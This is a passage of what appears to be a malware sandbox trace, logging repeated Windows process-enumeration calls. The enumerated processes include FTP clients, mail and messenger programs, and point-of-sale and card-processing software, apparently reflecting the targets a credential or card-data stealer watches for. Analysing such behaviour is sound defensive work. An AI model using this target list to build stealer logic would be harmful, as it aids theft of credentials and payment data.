lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0226.994] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0226.996] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0226.999] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0227.002] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0227.004] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0227.007] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0227.010] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0227.012] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0227.015] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0227.017] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0227.024] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0227.027] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0227.029] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0227.035] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0227.050] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0227.052] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0227.054] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0227.056] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0227.058] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0227.060] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0227.062] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0227.064] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0227.066] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0227.068] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0227.070] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0227.089] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0227.091] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0227.094] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0227.096] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0227.098] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0227.101] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0227.103] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0227.107] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0227.111] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0227.113] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0227.116] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0227.118] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0227.121] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0227.124] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0227.127] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0227.134] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0227.136] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0227.139] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0227.141] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0227.143] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0227.144] CloseHandle (hObject=0x2218) returned 1 [0227.145] Sleep (dwMilliseconds=0x64) [0227.249] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2218 [0227.264] Process32First (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.266] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0227.270] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0227.272] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0227.275] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0227.277] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0227.279] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0227.282] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0227.284] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0227.291] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.294] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.343] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0227.345] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.348] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.351] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.353] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.356] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.358] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.361] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.363] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0227.366] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0227.369] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0227.371] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0227.373] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.380] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0227.383] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0227.386] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0227.389] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0227.391] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0227.394] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0227.397] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.399] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0227.401] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0227.404] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0227.406] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.408] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0227.410] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0227.413] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0227.419] Process32Next (in: hSnapshot=0x2218, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, 